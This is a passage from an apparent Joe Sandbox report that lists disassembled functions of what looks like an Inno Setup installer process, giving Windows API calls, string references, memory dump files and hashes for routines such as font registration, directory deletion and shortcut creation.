MsgWaitForMultipleObjects.USER32 ref: 00453B0C
GetExitCodeProcess.KERNEL32 ref: 00453B19
CloseHandle.KERNEL32(?,?,?,00000000,00453B3D,?,?,?,00000001), ref: 00453B22

Strings

<, xrefs: 00453A78

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Wait$CloseCodeErrorExecuteExitHandleIdleInputLastMultipleObjectsProcessShell
String ID: <
API String ID: 35504260-4251816714
Opcode ID: 2f1c130e37fdf713c8ee09ae2cb80f7031dc9d6702a27a2de752bd04e6bc53ea
Instruction ID: 4f2f080ffbf6904bd028b80bde58d5dd14a7ef3b31ce35135e268bb2354b5d84
Opcode Fuzzy Hash: 2f1c130e37fdf713c8ee09ae2cb80f7031dc9d6702a27a2de752bd04e6bc53ea
Instruction Fuzzy Hash: 51315071A00209ABDB10EFA5C885B9E7BF8AF08355F10457AF850E73D2D7789E58CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00468898 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 89registrywindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DCB4: 6CAD6790.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004783BF,?,00000001,?,?,004783BF,?,00000001,00000000), ref: 0042DCD0

6CAD68C0.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,00468995,?,?,?,?,00000000), ref: 004688FF
RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,00468995), ref: 00468916

Part of subcall function 00455B64: GetLocalTime.KERNEL32(?,00000000,00455CEB,?,?,0048DF10,00000000), ref: 00455B94

AddFontResourceA.GDI32(00000000), ref: 00468933
SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00468947

Strings

AddFontResource, xrefs: 00468951
Failed to open Fonts registry key., xrefs: 0046891D
Failed to set value in Fonts registry key., xrefs: 00468908

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: CloseD6790FontLocalMessageNotifyResourceSendTime
String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
API String ID: 1945327637-649663873
Opcode ID: e6afbb8ca94d69d81efcd09594ad7b5c6e9f67c3cc44129aa4173a6e7730ce8b
Instruction ID: 0b7725eea1bbc5b47538e9e1a37f4b943f12462ceb285dff8d0c763eb406a5a1
Opcode Fuzzy Hash: e6afbb8ca94d69d81efcd09594ad7b5c6e9f67c3cc44129aa4173a6e7730ce8b
Instruction Fuzzy Hash: 3121A3B170020476EB10FB668C42B6E679C9B45748F14457FB940EB2C2EA7C9909862F

Uniqueness

Uniqueness Score: -1.00%

Function 004894C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 80sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00455B64: GetLocalTime.KERNEL32(?,00000000,00455CEB,?,?,0048DF10,00000000), ref: 00455B94

Part of subcall function 00450104: SetEndOfFile.KERNEL32(?,00000000,0046730A), ref: 0045010B

Part of subcall function 00406FE4: 6CAD5F60.KERNEL32(00000000,0048D628,0048B356,00000000,0048B3AB,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406FEF

GetWindowThreadProcessId.USER32(00000000,?), ref: 00489548
OpenProcess.KERNEL32(001F0000,00000000,?,00000000,?), ref: 00489558
SendMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 0048956E
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,001F0000,00000000,?,00000000,?), ref: 00489576
CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,001F0000,00000000,?,00000000,?), ref: 0048957C
Sleep.KERNEL32(000001F4,00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,001F0000,00000000,?,00000000,?), ref: 00489586

Strings

Deleting Uninstall data files., xrefs: 004894C7

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Process$CloseFileHandleLocalMessageObjectOpenSendSingleSleepThreadTimeWaitWindow
String ID: Deleting Uninstall data files.
API String ID: 2216181474-2568741658
Opcode ID: a7476f27cfffe04056263bd10cd1b593b18116b72e861790a672fea6345fcbe5
Instruction ID: 51625d6d662208fa7e89ffb5b1f44e64a7f96a7290d480644ff5f3bae53c224a
Opcode Fuzzy Hash: a7476f27cfffe04056263bd10cd1b593b18116b72e861790a672fea6345fcbe5
Instruction Fuzzy Hash: DB219571704600ABE711F77AEC42B2E37A8D745718F54493BF9009B1E3D678AC008B1D

Uniqueness

Uniqueness Score: -1.00%

Function 00456E24 Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 121COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00456FA6,?,00000000,?,00000000), ref: 00456EEA

Part of subcall function 00452C90: FindClose.KERNEL32(000000FF,00452D86), ref: 00452D75

Part of subcall function 00455B64: GetLocalTime.KERNEL32(?,00000000,00455CEB,?,?,0048DF10,00000000), ref: 00455B94

Strings

Deleting directory: %s, xrefs: 00456E73
Stripped read-only attribute., xrefs: 00456EAC
Failed to delete directory (%d)., xrefs: 00456F80
Failed to delete directory (%d). Will retry later., xrefs: 00456F03
Failed to strip read-only attribute., xrefs: 00456EB8
Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00456F5F
Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00456EC4

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: CloseErrorFindLastLocalTime
String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
API String ID: 3419951142-1448842058
Opcode ID: be68cc5c2ea1bb27d3a1968eb94943e1c89a635c1c6de34cf41a108ae22edbf3
Instruction ID: a666114b09b834b90605eb2e029ce1ef81d745acec5bf68a3cedde6ddf24539b
Opcode Fuzzy Hash: be68cc5c2ea1bb27d3a1968eb94943e1c89a635c1c6de34cf41a108ae22edbf3
Instruction Fuzzy Hash: 9F41B331E042449ACB10DB69D8463AE76E55F4530AF96857BBC0197393CB7C8A0DC75A

Uniqueness

Uniqueness Score: -1.00%

Function 00422F18 Relevance: 12.1, APIs: 8, Instructions: 119windowCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 00422F6C
GetCapture.USER32 ref: 00422F7B
SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422F81
ReleaseCapture.USER32(00000000,0000001F,00000000,00000000), ref: 00422F86
GetActiveWindow.USER32 ref: 00422F95
SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00423014
SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00423078
GetActiveWindow.USER32 ref: 00423087

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: CaptureMessageSend$ActiveWindow$Release
String ID:
API String ID: 862346643-0
Opcode ID: b07b682a0d3db05e04191161431f274fd874955fc59dbb90a6b8777cc5b5653a
Instruction ID: f320766799f76b56ff1f73815002e471a00f175123ebad8ebd638d1fe61db66b
Opcode Fuzzy Hash: b07b682a0d3db05e04191161431f274fd874955fc59dbb90a6b8777cc5b5653a
Instruction Fuzzy Hash: BC413F70B00259AFDB10EFA9DA46B9E77F1EF48304F5140BAF414AB292D7789E409B1C

Uniqueness

Uniqueness Score: -1.00%

Function 00429548 Relevance: 12.1, APIs: 8, Instructions: 62COMMON

Download Yara Rule

APIs

72E5AC50.USER32(00000000), ref: 00429552
GetTextMetricsA.GDI32(00000000), ref: 0042955B

Part of subcall function 0041A2B0: CreateFontIndirectA.GDI32(?), ref: 0041A36F

SelectObject.GDI32(00000000,00000000), ref: 0042956A
GetTextMetricsA.GDI32(00000000,?), ref: 00429577
SelectObject.GDI32(00000000,00000000), ref: 0042957E
72E5B380.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00429586
GetSystemMetrics.USER32 ref: 004295AB
GetSystemMetrics.USER32 ref: 004295C5

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Metrics$ObjectSelectSystemText$B380CreateFontIndirect
String ID:
API String ID: 3751190600-0
Opcode ID: 42eb9f9568d47a56d4dd64e5859645b6fd94eef733c9255efa467db7d7aa65c1
Instruction ID: 49a99a9963fa550412aa89e52ade3804ecb6ea0e128110f1924ac4b1d55f2594
Opcode Fuzzy Hash: 42eb9f9568d47a56d4dd64e5859645b6fd94eef733c9255efa467db7d7aa65c1
Instruction Fuzzy Hash: C101E1A27053203AE711A7BADCC2B6B25C8CF84358F44053BF646DA3C2D96D9C90836E

Uniqueness

Uniqueness Score: -1.00%

Function 0041DEEC Relevance: 12.1, APIs: 8, Instructions: 60windowCOMMON

Download Yara Rule

APIs

72E5AC50.USER32(00000000,?,00419121,0048B789), ref: 0041DEEF
72E5AD70.GDI32(00000000,0000005A,00000000,?,00419121,0048B789), ref: 0041DEF9
72E5B380.USER32(00000000,00000000,00000000,0000005A,00000000,?,00419121,0048B789), ref: 0041DF06
MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DF15
GetStockObject.GDI32(00000007), ref: 0041DF23
GetStockObject.GDI32(00000005), ref: 0041DF2F
GetStockObject.GDI32(0000000D), ref: 0041DF3B
LoadIconA.USER32 ref: 0041DF4C

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: ObjectStock$B380IconLoad
String ID:
API String ID: 1412791550-0
Opcode ID: dd4b9c7aef87865718c000e397f45e154360b1af399aa1f9483cb2bab1bb8be1
Instruction ID: ae707862530499e61e56544efeec0af492468148c1ffb6533c46f2cff97e135a
Opcode Fuzzy Hash: dd4b9c7aef87865718c000e397f45e154360b1af399aa1f9483cb2bab1bb8be1
Instruction Fuzzy Hash: 7011F1B0A452096EE740BF695C52B6E2794EB14708F00843FF608BF2E1E7792C408B6E

Uniqueness

Uniqueness Score: -1.00%

Function 0045D4C8 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 281COMMON

Download Yara Rule

APIs

LoadCursorA.USER32 ref: 0045D594
SetCursor.USER32(00000000,00000000,00007F02), ref: 0045D59A
SetCursor.USER32(00000000,0045D866,00007F02), ref: 0045D5F0

Strings

, xrefs: 0045D841
, xrefs: 0045D85C
@, xrefs: 0045D6BB

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Cursor$Load
String ID: $ $@
API String ID: 1675784387-2546599590
Opcode ID: 6ccaf6c9540996d4e0a6697c76b1ecd3fa8062e0d884f2f87ba891cbd3cdf676
Instruction ID: b001bef726f5750741a7b03e36ed03e6f94e887b89092d92c47412017fe15e3a
Opcode Fuzzy Hash: 6ccaf6c9540996d4e0a6697c76b1ecd3fa8062e0d884f2f87ba891cbd3cdf676
Instruction Fuzzy Hash: 3EC18230E006449FDB20EF69C985B9EBBF1EF04315F1485AAE855977A2D778AE48CB04

Uniqueness

Uniqueness Score: -1.00%

Function 004525EC Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 225COMMON

Download Yara Rule

APIs

WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004526D3

Strings

.tmp, xrefs: 0045268F
WININIT.INI, xrefs: 00452681
NUL, xrefs: 00452795
[rename], xrefs: 00452736, 00452772
MoveFileEx, xrefs: 004528E3

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
API String ID: 390214022-3304407042
Opcode ID: c2048ae5e48d74ef76196b4200b5e20616c6102c4444108598072f678010fe0f
Instruction ID: d61ef256aa0c7cd0868eec0a7ced69166b375f92d2fe722ad9f6fe2e6f6e2ff5
Opcode Fuzzy Hash: c2048ae5e48d74ef76196b4200b5e20616c6102c4444108598072f678010fe0f
Instruction Fuzzy Hash: 34911174E002099BDB11EBA5C942BDEB7B5EF49305F508567EC00B7392D7B8AE09CA58

Uniqueness

Uniqueness Score: -1.00%

Function 00454B88 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 178COMMON

Download Yara Rule

APIs

76E2B690.OLE32(0048CA20,00000000,00000001,0048C788,?,00000000,00454D7E), ref: 00454BC4

Part of subcall function 00403DEC: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403E26
Part of subcall function 00403DEC: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403E31

76E2B690.OLE32(0048C778,00000000,00000001,0048C788,?,00000000,00454D7E), ref: 00454BE8
SysFreeString.OLEAUT32(00000000), ref: 00454D43

Strings

CoCreateInstance, xrefs: 00454BF3
IShellLink::QueryInterface, xrefs: 00454CBB
IPersistFile::Save, xrefs: 00454D15

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: B690String$AllocByteCharFreeMultiWide
String ID: CoCreateInstance$IPersistFile::Save$IShellLink::QueryInterface
API String ID: 3058977878-615220198
Opcode ID: 3ded40c75012dff9dd3ae82a8ffb6f9a9cc022837f73b4f2e7b1fd63269d23d0
Instruction ID: 47847e775519555dd8af957fb4ba689ed973b0fe44fd76accd0468b8e366bdf7
Opcode Fuzzy Hash: 3ded40c75012dff9dd3ae82a8ffb6f9a9cc022837f73b4f2e7b1fd63269d23d0
Instruction Fuzzy Hash: 8F513171600105AFDB50EFA9C885F9E77F8AF88305F014065F914EB252D778DD48CB18

Uniqueness

Uniqueness Score: -1.00%

Function 004087B4 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167COMMON

Download Yara Rule

APIs

GetSystemDefaultLCID.KERNEL32(00000000,004089FC,?,?,?,?,00000000,00000000,00000000,?,00409A43,00000000,00409A56), ref: 004087CE

Part of subcall function 004085FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0048D4C0,00000001,?,004086C7,?,00000000,004087A6), ref: 0040861A

Part of subcall function 00408648: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040884A,?,?,?,00000000,004089FC), ref: 0040865B

Strings

mmmm d, yyyy, xrefs: 004088BF
m/d/yy, xrefs: 0040889D
AMPM, xrefs: 00408999
:mm, xrefs: 004089B0
:mm:ss, xrefs: 004089CA

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: InfoLocale$DefaultSystem
String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
API String ID: 1044490935-665933166
Opcode ID: 865e2fdc49fa9c0e7c69f9e116ed740243eb306fe370b25025bc42776b06ac5e
Instruction ID: 1898f190052903b7415bb522bcd58ff52e8278006798509407b2a1fcb900f596
Opcode Fuzzy Hash: 865e2fdc49fa9c0e7c69f9e116ed740243eb306fe370b25025bc42776b06ac5e
Instruction Fuzzy Hash: 5D513A24B01248ABDB01FAA99D41A9E776ADB88704F50D47FB041BB7D7CE3CDA059B1C

Uniqueness

Uniqueness Score: -1.00%

Function 004117BC Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 158windowCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00000000,004119C1), ref: 00411854
InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 00411912

Part of subcall function 00411B74: CreatePopupMenu.USER32(?,0041197D,00000000,00000000,004119C1), ref: 00411B8E

InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 0041199E

Part of subcall function 00411B74: CreateMenu.USER32(?,0041197D,00000000,00000000,004119C1), ref: 00411B98

InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 00411985

Strings

?, xrefs: 0041186E
,, xrefs: 00411867

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Menu$Insert$Create$ItemPopupVersion
String ID: ,$?
API String ID: 2359071979-2308483597
Opcode ID: 01793db05cc1d1000f61b38ee2be08afbd7054388c0db830af7fa18c141c7570
Instruction ID: 7ba0501c80767f15217744d9ac03cda2ca3cae6e070b487bfbc79445ba8f9420
Opcode Fuzzy Hash: 01793db05cc1d1000f61b38ee2be08afbd7054388c0db830af7fa18c141c7570
Instruction Fuzzy Hash: C75126B0A101449BDB10EF7ADC816EE7BF5AB09304B15857BF944E72A2D73CDA41CB18

Uniqueness

Uniqueness Score: -1.00%

Function 0041BF2B Relevance: 10.7, APIs: 7, Instructions: 153windowCOMMON

Download Yara Rule

APIs

GetObjectA.GDI32(?,00000018,?), ref: 0041BFF0
GetObjectA.GDI32(?,00000018,?), ref: 0041BFFF
GetBitmapBits.GDI32(?,?,?), ref: 0041C050
GetBitmapBits.GDI32(?,?,?), ref: 0041C05E
DeleteObject.GDI32(?), ref: 0041C067
DeleteObject.GDI32(?), ref: 0041C070
CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041C08D

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Object$BitmapBitsDelete$CreateIcon
String ID:
API String ID: 1030595962-0
Opcode ID: 21ac1b7a451ae89d67a64f248cb283bf6ff7d59a21f2225fedb955a524ed5c7e
Instruction ID: d63a52ddb0c8291f5c637ced4972fc4f1cb22fce5bbc263bf6f2b973d959c792
Opcode Fuzzy Hash: 21ac1b7a451ae89d67a64f248cb283bf6ff7d59a21f2225fedb955a524ed5c7e
Instruction Fuzzy Hash: 6E511675A00219AFCB10DFE9C8819DEB7F9EF48314B11856AF914E7391D738AD82CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0041CFA0 Relevance: 10.7, APIs: 7, Instructions: 152windowCOMMON

Download Yara Rule

APIs

SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CFC6
72E5AD70.GDI32(00000000,00000026), ref: 0041CFE5
72E5B410.GDI32(?,?,00000001,00000000,00000026), ref: 0041D04B
72E5B150.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041D05A
StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041D0C4
StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D102
72E5B410.GDI32(?,?,00000001,0041D134,00000000,00000026), ref: 0041D127

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Stretch$B410$B150BitsMode
String ID:
API String ID: 1142175050-0
Opcode ID: 1aa12a6cbd08d8255b6eb8068d6bae64d2c5071c0f10fac204963572875c048a
Instruction ID: 205027aeaf3ec0e52080f5777dc3b0bf9e1b7b1a1eecc77d6eedf305108e6316
Opcode Fuzzy Hash: 1aa12a6cbd08d8255b6eb8068d6bae64d2c5071c0f10fac204963572875c048a
Instruction Fuzzy Hash: 4B514CB0A00204BFDB14DFA9C995F9BBBE8EF08304F108599B544D7292C779ED81CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0045525C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,?,?), ref: 004552AE

Part of subcall function 00424344: GetWindowTextA.USER32 ref: 00424364

Part of subcall function 0041EF6C: GetCurrentThreadId.KERNEL32 ref: 0041EFBB
Part of subcall function 0041EF6C: 72E5AC10.USER32(00000000,0041EF1C,00000000,00000000,0041EFD8,?,00000000,0041F00F,?,00000000,00000000,021E2410), ref: 0041EFC1

Part of subcall function 0042438C: SetWindowTextA.USER32(?,00000000), ref: 004243A4

GetMessageA.USER32 ref: 00455315
TranslateMessage.USER32(?), ref: 00455333
DispatchMessageA.USER32 ref: 0045533C

Strings

[Paused] , xrefs: 004552E4

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

